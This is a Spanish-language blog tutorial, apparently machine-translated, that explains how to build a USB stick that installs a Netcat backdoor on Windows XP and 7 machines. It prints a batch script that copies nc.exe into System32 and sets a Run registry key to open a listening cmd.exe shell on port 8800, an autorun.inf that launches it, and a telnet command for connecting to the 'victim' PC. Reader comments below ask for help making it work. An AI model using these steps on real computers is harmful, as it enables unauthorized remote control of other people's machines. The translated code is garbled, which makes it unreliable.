Tome el control de una PC remota con una llave USB

FunInformatique Hace 10 meses 4 minutos de lectura

cómo inyectar una puerta trasera con una llave usb

Última actualización: 10 de julio de 2023

En los artículos anteriores, hemos visto cómo crear un Memoria USB rootkit que recupera contraseñas de una computadora bajo Windows. hoy veremos cómo crear una llave USB que abre una puerta trasera en una máquina Windows.

Este rootkit se ejecuta automáticamente, crea un puerta trasera en una pc Windows et vous permét de tomar el control de forma remota.

como de costumbre elobjetivo este tutorial, es mostrar a los líderes empresariales cuánto el uso de llaves USB puede ser peligroso. Lo que vale para las empresas no lo es menos para los particulares.

Toma el control de una PC de forma remota

Para tomar el control de una PC remota con una llave USB, siga los pasos anteriores:

Descarga la herramienta Netcat

Primero, crearemos una nueva carpeta en nuestra unidad USB. Luego vamos a descargar netcat, una utilidad para abrir conexiones de red, ya sea UDP o TCP.

También puede utilizar la herramienta Cryptcat, el clon de Netcat, con la única condición de que este último cifre sus comunicaciones.

Descargar Netcat para windows

Después de descargar Netcat, lo descomprimimos en la carpeta creada recientemente.

Crear una secuencia de comandos .bat

Luego crearemos un archivo puerta trasera murciélago. Este pequeño archivo tiene dos objetivos:

Copie los archivos de Netcat en la carpeta System32 de la computadora de destino.
Agregue un valor de cadena en el registro de la PC víctima para que nuestra puerta trasera se inicie en cada arranque.

Para ello, crearemos un nuevo documento de texto con el editor de texto Bloc de notas u otro editor de texto y pegaremos el siguiente código:

copiar *.* "%SYSTEMROOT%/System32"
REG AÑADIR « HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun” /v “puerta trasera” /t “REG_SZ” /d “%SYSTEMROOT%System32nc.exe -d -L -e cmd.exe -p 8800”

Crear un archivo de ejecución automática

Ahora tenemos que crear el archivo. autorun.inf.

En este paso, crearemos una nueva opción en la ventana que aparece al insertar un USB, que nos permitirá (una vez pulsado sobre él) instalar nuestro backdoor en el equipo de destino.

Para lograr esto, abra un nuevo documento de texto y luego inserte este código:

[Autorun]
abierto = puerta trasera.bat
ACTION=”darle un nombre a esta acción”

Finalmente guardamos el archivo bajo la raíz de la clave con el nombre autorun.inf

Implementar la puerta trasera creada

Después de insertar la llave USB, puede conectarse desde cualquier máquina a la estación de trabajo de la víctima con el siguiente comando:

telnet 192.168.1.17 8800

192.168.1.17 designa la dirección IP de la máquina remota que debe reemplazar. Y 8800 es el puerto a usar para conectarse.

¡Y ahí tienes! Con esta técnica podrás tomar el control de una PC de forma remota. Puedes hacer lo que quieras: abrir archivos, iniciar una búsqueda, ejecutar un programa...

Aquí hay una lista de los comandos para manejar la máquina a distancia: Leer pedidos Windows.

Para cerrar sesión, escriba "cerrar sesión".

Haz un buen uso de ella.

Nota: este truco no funciona bajo Windows 10 et Windows 11. Sólo funciona en Windows 7 y Windows XP.

Si te ha gustado este tutorial, Suscríbete a nuestro boletín o google Noticias ¡para que no te pierdas nada! ¿Quieres apoyarnos? Invítanos un café ☕️. Gracias por su apoyo !

23 comentarios

Comentarios online

Mostrar todos los comentarios

Esdras

hace 1 año

no se muy bien como conectar
Incluso si quitamos la llave, ¿seguimos conectados?
¿Y también a qué nivel pone el código?
¿Al símbolo del sistema o al netcap?

Responder

anónimo

Hace 4 años

hola hay alguna manera de hacer lo mismo pero en windows 10?

raptou

hola cuando quiero conectarme a netcat u otro me pide un codigo y no lo encuentro

Desconocido

Hace 7 años

No entiendo. ¿Dónde encontrar el puerto? y donde insertar el comando telnet… en el cmd?

Theo Wolfersperger

hola, la carpeta autorun.inf no funciona, la guardo como ,
autorun.inf y lo puse directamente en mi llave usb, pero al insertar
llave usb, no se muestra nada. un poco de ayuda por favor?? Y el comando telnet 192.168.1.17 880, hay que teclearlo en CMD??

Respuesta Theo Wolfersperger

Hace 6 años

estás seguro windows 10 ¿supongo? PORQUE EN windows 10 Borraron el .inf porque era la puerta abierta a todos los hackers

GTA-Producción

los enlaces estan muertos

vaquero

Respuesta GTA-Producción

no.

juguet patrick

Hace 8 años

Ahmad hola,
Muy interesante articulo, solo un problema no funciona, explico mi problema.
Tengo un pc antiguo xp en el que introduje el backdoor siguiendo al pie de la letra tu tutorial.
Cuando lanzo telnet bajo ubuntu, este no puede resolver la dirección IP del xp
telnet: no se pudo resolver xxx.xxx.x.xx…8800/telnet: nombre o servicio no
un ipconfig en la consola xp me confirma, sin embargo, que es el correcto.
Une idée?
Gracias de antemano y buenas noches

Paul

Hace 9 años

¿No debería haber una barra invertida allí?
copiar *.* "%SYSTEMROOT%/System32"
copiar *.* "%SYSTEMROOT%/System32"
copiar *.* "%SYSTEMROOT%/System32"
??
De lo contrario, todo lo que falta es configurarlo para robar la IP de la computadora de destino 🙂

Lerín

Hola, estoy interesado en la seguridad informática y me gustaría saber si creamos un backdoor en una computadora. Esto plantea un problema porque abrimos un puerto aquí en 8800, por lo que cualquiera puede conectarse si envía solicitudes y ve el puerto.
Merci

principiante

Hola a todos . Disculpe por tener acceso completo a esta computadora de forma remota, ¿necesito internet?

Ahmed

Respuesta principiante

Exacto, necesitarás una conexión a internet.

Killian Armand

Respuesta Ahmed

Hola, cuando ingreso el comando en NetCat, el programa me devuelve “lookup fail errno 1004 NO_NATA” algo así… ¿Me pueden ayudar por favor?

Tome el control de una PC remota con una llave USB